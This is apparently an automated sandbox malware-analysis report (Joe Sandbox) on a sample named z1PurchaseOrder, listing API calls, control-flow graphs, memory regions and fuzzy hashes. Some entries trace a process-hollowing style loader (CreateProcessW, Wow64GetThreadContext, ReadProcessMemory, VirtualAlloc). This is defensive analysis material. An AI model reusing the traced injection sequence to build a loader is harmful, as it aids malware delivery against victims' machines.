41ee9b 1525->1533 1526->1521 1534 415081-415085 1526->1534 1529 41502a-41502c 1527->1529 1528->1529 1529->1523 1554 415053-415058 1530->1554 1540 4150eb-4150fd call 417f23 1531->1540 1541 4150db-4150e8 call 4131f0 1531->1541 1536 4150b1-4150bd call 4131f0 1532->1536 1537 4150c0-4150d0 call 417f23 1532->1537 1542 415099-41509b 1533->1542 1534->1531 1535 415087-415096 1534->1535 1535->1542 1536->1537 1537->1502 1540->1502 1541->1540 1542->1508 1542->1509 1555 415114-415118 1554->1555 1556 41505e-415061 1554->1556 1555->1521 1556->1516 1557 415067-41506f 1556->1557 1557->1542
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1695789435.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1695742277.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695865433.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695906377.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695906377.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695983529.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_z1PurchaseOrder.jbxd
                                        Similarity
                                        • API ID: _memset$__filbuf__fileno__getptd_noexit__read_memcpy_s
                                        • String ID:
                                        • API String ID: 3886058894-0
                                        • Opcode ID: b117a392f3759847975495debe7ea87102f8b7de0bc78f8cbc322732e1c6b221
                                        • Instruction ID: 085ef53bf2cba992f8731f00f2d52beda6aca72a1b803249d76dffc069a60243
                                        • Opcode Fuzzy Hash: b117a392f3759847975495debe7ea87102f8b7de0bc78f8cbc322732e1c6b221
                                        • Instruction Fuzzy Hash: CA510830900604EFCB208FA9C8445DFBBB5EFC5324F24825BF82596290D7799ED2CB99

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 1558 4103e0-410461 CreateWindowExW * 2 ShowWindow * 2
                                        APIs
                                        • CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,?,00000000), ref: 00410415
                                        • CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,?,00000000), ref: 0041043E
                                        • ShowWindow.USER32(?,00000000), ref: 00410454
                                        • ShowWindow.USER32(?,00000000), ref: 0041045E
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1695789435.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1695742277.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695865433.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695906377.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695906377.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695983529.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_z1PurchaseOrder.jbxd
                                        Similarity
                                        • API ID: Window$CreateShow
                                        • String ID: AutoIt v3$edit
                                        • API String ID: 1584632944-3779509399
                                        • Opcode ID: 2f6e2284bb2ae2ba7cf4e865adc3bced08dc322388bda6343c860b78a8eff359
                                        • Instruction ID: daa3d4afae2654ee996124117597f48fa5c574a0ac4b96d00400a8ba476d7f73
                                        • Opcode Fuzzy Hash: 2f6e2284bb2ae2ba7cf4e865adc3bced08dc322388bda6343c860b78a8eff359
                                        • Instruction Fuzzy Hash: F3F0A975BE4310BAF6609754AC43F592B59A765F00F3445ABB700BF1D0D6E478408B9C

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 1559 40f4610-40f4737 call 40f2260 call 40f4500 CreateFileW 1566 40f473e-40f474e 1559->1566 1567 40f4739 1559->1567 1570 40f4755-40f476f VirtualAlloc 1566->1570 1571 40f4750 1566->1571 1568 40f47ee-40f47f3 1567->1568 1572 40f4773-40f478a ReadFile 1570->1572 1573 40f4771 1570->1573 1571->1568 1574 40f478e-40f47c8 call 40f4540 call 40f3500 1572->1574 1575 40f478c 1572->1575 1573->1568 1580 40f47ca-40f47df call 40f4590 1574->1580 1581 40f47e4-40f47ec ExitProcess 1574->1581 1575->1568 1580->1581 1581->1568
                                        APIs
                                          • Part of subcall function 040F4500: Sleep.KERNELBASE(000001F4), ref: 040F4511
                                        • CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 040F472D
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1698112253.00000000040F2000.00000040.00000020.00020000.00000000.sdmp, Offset: 040F2000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_40f2000_z1PurchaseOrder.jbxd
                                        Similarity
                                        • API ID: CreateFileSleep
                                        • String ID: 6S34TL2A7AIZP0Z
                                        • API String ID: 2694422964-113131765
                                        • Opcode ID: 7b4b5f63b8a55c9c3655fd24dcca345074355e05a584fa49d303357fb718203b
                                        • Instruction ID: 1de3e5eaf0a087df43a8847611c0630d64f7f123073be70fd5eb1739e72042a2
                                        • Opcode Fuzzy Hash: 7b4b5f63b8a55c9c3655fd24dcca345074355e05a584fa49d303357fb718203b
                                        • Instruction Fuzzy Hash: 6E518F30D04259EBEF11DBA4C814BEFBB79AF15704F0045A9E608BB6C0D7B91B49CBA5

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 1583 413a88-413a99 call 41718c 1586 413b10-413b15 call 4171d1 1583->1586 1587 413a9b-413aa2 1583->1587 1588 413aa4-413abc call 418407 call 419f6d 1587->1588 1589 413ae7 1587->1589 1601 413ac7-413ad7 call 413ade 1588->1601 1602 413abe-413ac6 call 419f9d 1588->1602 1591 413ae8-413af8 RtlFreeHeap 1589->1591 1591->1586 1594 413afa-413b0f call 417f23 GetLastError call 417ee1 1591->1594 1594->1586 1601->1586 1608 413ad9-413adc 1601->1608 1602->1601 1608->1591
                                        APIs
                                        • __lock.LIBCMT ref: 00413AA6
                                          • Part of subcall function 00418407: __mtinitlocknum.LIBCMT ref: 0041841D
                                          • Part of subcall function 00418407: __amsg_exit.LIBCMT ref: 00418429
                                          • Part of subcall function 00418407: EnterCriticalSection.KERNEL32(?,?,?,004224D3,00000004,0048CCA0,0000000C,00417011,00411739,?,00000000,00000000,00000000,?,00416C24,00000001), ref: 00418431
                                        • ___sbh_find_block.LIBCMT ref: 00413AB1
                                        • ___sbh_free_block.LIBCMT ref: 00413AC0
                                        • RtlFreeHeap.NTDLL(00000000,00411739,0048C758,0000000C,004183E8,00000000,0048CA38,0000000C,00418422,00411739,?,?,004224D3,00000004,0048CCA0,0000000C), ref: 00413AF0
                                        • GetLastError.KERNEL32(?,004224D3,00000004,0048CCA0,0000000C,00417011,00411739,?,00000000,00000000,00000000,?,00416C24,00000001,00000214), ref: 00413B01
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1695789435.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1695742277.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695865433.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695906377.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695906377.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695983529.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_z1PurchaseOrder.jbxd
                                        Similarity
                                        • API ID: CriticalEnterErrorFreeHeapLastSection___sbh_find_block___sbh_free_block__amsg_exit__lock__mtinitlocknum
                                        • String ID:
                                        • API String ID: 2714421763-0
                                        • Opcode ID: 1be655156b84d1756d47887b3dc267bc1ef03bd4322eaa0c22e254cdcea9361a
                                        • Instruction ID: 54fb22c17cbd059cfb8714ef359fce415cc636064f476ff80f42ef981757bf49
                                        • Opcode Fuzzy Hash: 1be655156b84d1756d47887b3dc267bc1ef03bd4322eaa0c22e254cdcea9361a
                                        • Instruction Fuzzy Hash: 7401A731A08301BADF206F71AC09BDF3B64AF00759F10052FF544A6182DB7D9AC19B9C
                                        APIs
                                          • Part of subcall function 0040F580: _wcslen.LIBCMT ref: 0040F58A
                                          • Part of subcall function 0040F580: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000001,00000000,00000000,00000000,00000000,?,?,?,?,?,?), ref: 0040F5A3
                                          • Part of subcall function 0040F580: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000001,00000000,00000000,00000000,00000000,?,-00000010,00000001,?,?,?,?), ref: 0040F5CC
                                        • _strcat.LIBCMT ref: 0040F603
                                          • Part of subcall function 0040F6A0: _memset.LIBCMT ref: 0040F6A8
                                          • Part of subcall function 0040F6D0: _strlen.LIBCMT ref: 0040F6D8
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1695789435.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1695742277.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695865433.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695906377.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695906377.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695983529.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_z1PurchaseOrder.jbxd
                                        Similarity
                                        • API ID: ByteCharMultiWide$_memset_strcat_strlen_wcslen
                                        • String ID: HH
                                        • API String ID: 1194219731-2761332787
                                        • Opcode ID: 6830d432ce0edc537904fcc81a92ccb4243d6e1eaca554fb6fd30da9042373f9
                                        • Instruction ID: 1fd31f67f6889806bd2ce24d6488871f5ee50ddf162d20410a363c4a19aba518
                                        • Opcode Fuzzy Hash: 6830d432ce0edc537904fcc81a92ccb4243d6e1eaca554fb6fd30da9042373f9
                                        • Instruction Fuzzy Hash: 022158B260825067C724EF7A9C8266EF7D8AF85308F148C3FF554D2282F638D555879A
                                        APIs
                                        • CreateProcessW.KERNELBASE(?,00000000), ref: 040F3D2D
                                        • Wow64GetThreadContext.KERNEL32(?,00010007), ref: 040F3D51
                                        • ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 040F3D73
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1698112253.00000000040F2000.00000040.00000020.00020000.00000000.sdmp, Offset: 040F2000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_40f2000_z1PurchaseOrder.jbxd
                                        Similarity
                                        • API ID: Process$ContextCreateMemoryReadThreadWow64
                                        • String ID:
                                        • API String ID: 2438371351-0
                                        • Opcode ID: cc658a0e6010fd3573e63fe9dffc1f366d2843c5c23e1a249a06af30add5367b
                                        • Instruction ID: 36d0083dc4c07dfcacb1580d17e898cd67040acba24de92a652820574ebeb87d
                                        • Opcode Fuzzy Hash: cc658a0e6010fd3573e63fe9dffc1f366d2843c5c23e1a249a06af30add5367b
                                        • Instruction Fuzzy Hash: 4B620B30A142589BEB24CFA4CC40BDEB376EF58304F1091A9D60DEB791E775AE81CB59
                                        APIs
                                        • _malloc.LIBCMT ref: 00411734
                                          • Part of subcall function 004138BA: __FF_MSGBANNER.LIBCMT ref: 004138DD
                                          • Part of subcall function 004138BA: __NMSG_WRITE.LIBCMT ref: 004138E4
                                          • Part of subcall function 004138BA: RtlAllocateHeap.NTDLL(00000000,0041172A,?,?,?,?,00411739,?,00401C0B), ref: 00413931
                                        • std::bad_alloc::bad_alloc.LIBCMT ref: 00411757
                                          • Part of subcall function 004116B0: std::exception::exception.LIBCMT ref: 004116BC
                                        • std::bad_exception::bad_exception.LIBCMT ref: 0041176B
                                        • __CxxThrowException@8.LIBCMT ref: 00411779
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1695789435.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1695742277.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695865433.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695906377.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695906377.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695983529.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_z1PurchaseOrder.jbxd
                                        Similarity
                                        • API ID: AllocateException@8HeapThrow_mallocstd::bad_alloc::bad_allocstd::bad_exception::bad_exceptionstd::exception::exception
                                        • String ID:
                                        • API String ID: 1411284514-0
                                        • Opcode ID: ca7221cdd9cc9326792a0c346bb7c35cd30f9974032eaa45b6addcc39664c516
                                        • Instruction ID: c554e94cc15d94fff19a40754e7570613bf3612ee9c26c673f8185df9075a277
                                        • Opcode Fuzzy Hash: ca7221cdd9cc9326792a0c346bb7c35cd30f9974032eaa45b6addcc39664c516
                                        • Instruction Fuzzy Hash: 6FF0E23550060A66CF08B723EC06ADE3B649F11798B10403BFA20552F2DF6DADC9865C
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1695789435.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1695742277.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695865433.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695906377.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695906377.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695983529.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_z1PurchaseOrder.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: c2b84d901eedfcb5732c73c427cf3e6a40f349a1394e6728fcd5bdf3f2a5d4d9
                                        • Instruction ID: a1f682be926937ece900e9fcc50ccc13891f43ead78ba7c6857800eee9f0599c
                                        • Opcode Fuzzy Hash: c2b84d901eedfcb5732c73c427cf3e6a40f349a1394e6728fcd5bdf3f2a5d4d9
                                        • Instruction Fuzzy Hash: EC81D2756043009FC310EF65C985B6AB7E4EF84315F008D2EF988AB392D779E909CB96
                                        APIs
                                        • RegOpenKeyExW.KERNELBASE(80000001,0040F0EE,00000000,00000001,80000001,?,0040F0EE,80000001,Control Panel\Mouse,SwapMouseButtons,00000004,?,?,0044BA28), ref: 0040F132
                                        • RegQueryValueExW.KERNELBASE(?,?,00000000,00000000,80000001,80000001,?,0040F0EE,80000001,Control Panel\Mouse,SwapMouseButtons,00000004,?,?,0044BA28), ref: 0040F14F
                                        • RegCloseKey.KERNELBASE(00000000,?,?,00000000,00000000,80000001,80000001,?,0040F0EE,80000001,Control Panel\Mouse,SwapMouseButtons,00000004,?,?,0044BA28), ref: 0040F159
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1695789435.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1695742277.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695865433.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695906377.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695906377.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695983529.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_z1PurchaseOrder.jbxd
                                        Similarity
                                        • API ID: CloseOpenQueryValue
                                        • String ID:
                                        • API String ID: 3677997916-0
                                        • Opcode ID: 2fc94d7b08a1a7677ebb25c0c676948635cded20fa34e442ec21f1e1bf5971ab
                                        • Instruction ID: 6acd5c45b0bc896a902747136fbadff1bb775023c46fd22fba7b324c5144c726
                                        • Opcode Fuzzy Hash: 2fc94d7b08a1a7677ebb25c0c676948635cded20fa34e442ec21f1e1bf5971ab
                                        • Instruction Fuzzy Hash: 60F0BDB0204202ABD614DF54DD88E6BB7F9EF88704F10492DB585D7250D7B4A804CB26
                                        APIs
                                        • _malloc.LIBCMT ref: 00435278
                                          • Part of subcall function 004138BA: __FF_MSGBANNER.LIBCMT ref: 004138DD
                                          • Part of subcall function 004138BA: __NMSG_WRITE.LIBCMT ref: 004138E4
                                          • Part of subcall function 004138BA: RtlAllocateHeap.NTDLL(00000000,0041172A,?,?,?,?,00411739,?,00401C0B), ref: 00413931
                                        • _malloc.LIBCMT ref: 00435288
                                        • _malloc.LIBCMT ref: 00435298
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1695789435.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1695742277.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695865433.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695906377.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695906377.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695983529.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_z1PurchaseOrder.jbxd
                                        Similarity
                                        • API ID: _malloc$AllocateHeap
                                        • String ID:
                                        • API String ID: 680241177-0
                                        • Opcode ID: d11b1792ef3d24f06ef5636d78d46cf58a843b0d423fa777cd48d8e801ebef30
                                        • Instruction ID: 30b75876ff52ae1c35022de4a6700901ba1db26c97f4d16f7fcf584af9a5a73f
                                        • Opcode Fuzzy Hash: d11b1792ef3d24f06ef5636d78d46cf58a843b0d423fa777cd48d8e801ebef30
                                        • Instruction Fuzzy Hash: E5F0A0B1500F0046E660AB3198457C7A2E09B14307F00186FB6855618ADA7C69C4CEAC
                                        APIs
                                        • _wcslen.LIBCMT ref: 00401B71
                                          • Part of subcall function 0041171A: _malloc.LIBCMT ref: 00411734
                                          • Part of subcall function 0041171A: std::bad_alloc::bad_alloc.LIBCMT ref: 00411757
                                          • Part of subcall function 0041171A: std::bad_exception::bad_exception.LIBCMT ref: 0041176B
                                          • Part of subcall function 0041171A: __CxxThrowException@8.LIBCMT ref: 00411779
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1695789435.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1695742277.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695865433.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695906377.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695906377.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695983529.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_z1PurchaseOrder.jbxd
                                        Similarity
                                        • API ID: Exception@8Throw_malloc_wcslenstd::bad_alloc::bad_allocstd::bad_exception::bad_exception
                                        • String ID: @EXITCODE
                                        • API String ID: 580348202-3436989551
                                        • Opcode ID: 48d001a4b96ee351bc7679959485890c1c6d832d60c6cde5ea273d4c8ab31dfe
                                        • Instruction ID: 288ad252d7dad0c090ff8240dee62855692e698d70424b42c0a66861a7771545
                                        • Opcode Fuzzy Hash: 48d001a4b96ee351bc7679959485890c1c6d832d60c6cde5ea273d4c8ab31dfe
                                        • Instruction Fuzzy Hash: 73F06DF2A002025BD7649B35DC0276776E4AB44704F18C83EE14AC7791F6BDE8829B15
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1695789435.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1695742277.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695865433.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695906377.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695906377.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695983529.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_z1PurchaseOrder.jbxd
                                        Similarity
                                        • API ID: ClearVariant
                                        • String ID:
                                        • API String ID: 1473721057-0
                                        • Opcode ID: e8abe42c1057cb3860218bb04af0a307767d699fcca626a70098e271a71bf477
                                        • Instruction ID: 1f11e118333250ff1b1cce483c812f274274124743f71e781b8a547d9d3e43da
                                        • Opcode Fuzzy Hash: e8abe42c1057cb3860218bb04af0a307767d699fcca626a70098e271a71bf477
                                        • Instruction Fuzzy Hash: 35917E706042009FC714DF55D890A6AB7E5EF89318F14896FF849AB392D738EE41CB9E
                                        APIs
                                        • CreateFileW.KERNELBASE(?,80000000,00000001,00000000,00000003,00000080,00000000,?,0040DFD2,?,00000001,00403843,?), ref: 0040F00A
                                        • CreateFileW.KERNEL32(?,C0000000,00000003,00000000,00000004,00000080,00000000,?,0040DFD2,?,00000001,00403843,?), ref: 004299D9
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1695789435.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1695742277.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695865433.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695906377.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695906377.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695983529.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_z1PurchaseOrder.jbxd
                                        Similarity
                                        • API ID: CreateFile
                                        • String ID:
                                        • API String ID: 823142352-0
                                        • Opcode ID: 7605a8ea73ac57d11bec7dd1d6207c313580f8ed20fa142c5c15d61e0266fbc2
                                        • Instruction ID: 855a981e3d87b0586b227f36a287a9e63fe5cd358b5bfab8de368ff291d46a89
                                        • Opcode Fuzzy Hash: 7605a8ea73ac57d11bec7dd1d6207c313580f8ed20fa142c5c15d61e0266fbc2
                                        • Instruction Fuzzy Hash: 67011D703803107AF2311F28AD5BF5632546B44B24F244B39FBD5BE2E2D2F86885970C
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1695789435.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1695742277.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695865433.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695906377.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695906377.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695983529.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_z1PurchaseOrder.jbxd
                                        Similarity
                                        • API ID: __lock_file_memset
                                        • String ID:
                                        • API String ID: 26237723-0
                                        • Opcode ID: c74911371e76cb9dc4786cfdbe28690debad29cef5acae8c4501fea9e7903076
                                        • Instruction ID: c8a12bf2a45d0ac11074f8cac28b928f9e20b60047ac9024d749846706a082ab
                                        • Opcode Fuzzy Hash: c74911371e76cb9dc4786cfdbe28690debad29cef5acae8c4501fea9e7903076
                                        • Instruction Fuzzy Hash: 32012971C00609FBCF22AF65DC029DF3B31AF44714F04815BF82416261D7798AA2DF99
                                        APIs
                                          • Part of subcall function 00417F23: __getptd_noexit.LIBCMT ref: 00417F23
                                          • Part of subcall function 00417EBB: __decode_pointer.LIBCMT ref: 00417EC6
                                        • __lock_file.LIBCMT ref: 00414EE4
                                          • Part of subcall function 00415965: __lock.LIBCMT ref: 0041598A
                                        • __fclose_nolock.LIBCMT ref: 00414EEE
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1695789435.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1695742277.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695865433.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695906377.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695906377.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695983529.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_z1PurchaseOrder.jbxd
                                        Similarity
                                        • API ID: __decode_pointer__fclose_nolock__getptd_noexit__lock__lock_file
                                        • String ID:
                                        • API String ID: 717694121-0
                                        • Opcode ID: 6051778e024176e7de16a1974b8d1b3b80c3b8a23747dfcb666cdf4e7799d8f6
                                        • Instruction ID: 225a509e04b880138f2478077c57af59103cae2c072c29012e7845c0956b1514
                                        • Opcode Fuzzy Hash: 6051778e024176e7de16a1974b8d1b3b80c3b8a23747dfcb666cdf4e7799d8f6
                                        • Instruction Fuzzy Hash: DEF06270D0470499C721BB6A9802ADE7AB0AFC1338F21864FE479A72D1C77C46C29F5D
                                        APIs
                                        • TranslateMessage.USER32(?), ref: 004098F6
                                        • DispatchMessageW.USER32(?), ref: 00409901
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1695789435.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1695742277.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695865433.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695906377.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695906377.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695983529.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_z1PurchaseOrder.jbxd
                                        Similarity
                                        • API ID: Message$DispatchTranslate
                                        • String ID:
                                        • API String ID: 1706434739-0
                                        • Opcode ID: 743ba5b075e4e96b6aa8f27e888cbbcb244a1ef3297f43ff84cf2107d4412f6a
                                        • Instruction ID: 6b3a2aeb923af73eb4cdb1bab797699f2cf27729a5018e8568c19fb4e3feaf67
                                        • Opcode Fuzzy Hash: 743ba5b075e4e96b6aa8f27e888cbbcb244a1ef3297f43ff84cf2107d4412f6a
                                        • Instruction Fuzzy Hash: D4F05471114301AEDA24DBE58D41B5BB3A8AFD8700F408C2EBA51E61C1FBF8E404C76A
                                        APIs
                                        • TranslateMessage.USER32(?), ref: 004098F6
                                        • DispatchMessageW.USER32(?), ref: 00409901
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1695789435.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1695742277.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695865433.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695906377.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695906377.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
